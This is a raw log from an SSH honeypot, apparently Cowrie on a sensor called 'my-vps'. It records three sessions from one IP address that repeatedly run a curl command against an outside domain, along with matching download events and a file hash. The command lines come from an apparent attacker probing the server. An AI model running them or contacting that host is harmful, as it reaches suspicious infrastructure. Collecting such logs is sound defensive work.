{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.546846Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.551568Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.578065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.579870Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.582327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.584609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.585463Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.586096Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.592010Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.592558Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.594020Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.594781Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.625230Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.625731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.629067Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.631716Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.633054Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.633836Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.638007Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.639299Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.643489Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.669128Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.672023Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.675170Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.676876Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.683435Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.684033Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.687297Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.688724Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.692176Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.693336Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.693796Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.732658Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.734870Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.736560Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.737132Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.738565Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.739071Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.743528Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.745847Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.747049Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.783256Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.784114Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.784609Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.787047Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.787570Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.790020Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.796323Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.796998Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:58.060431Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.062871Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.161953Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.387104Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.533203Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:58.544510Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.545439Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.557357Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:58.558847Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:58.559547Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:59.270319Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.283896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:59.367605Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.374603Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:59.438392Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.441816Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.594552Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.727037Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:59.734834Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:00.036592Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.039350Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:00.063221Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.072155Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:00.155527Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.167557Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.436068Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.446532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:00.857089Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:00.880391Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:01.025218Z","src_ip":"212.227.125.160","session":"9f264c568782"}
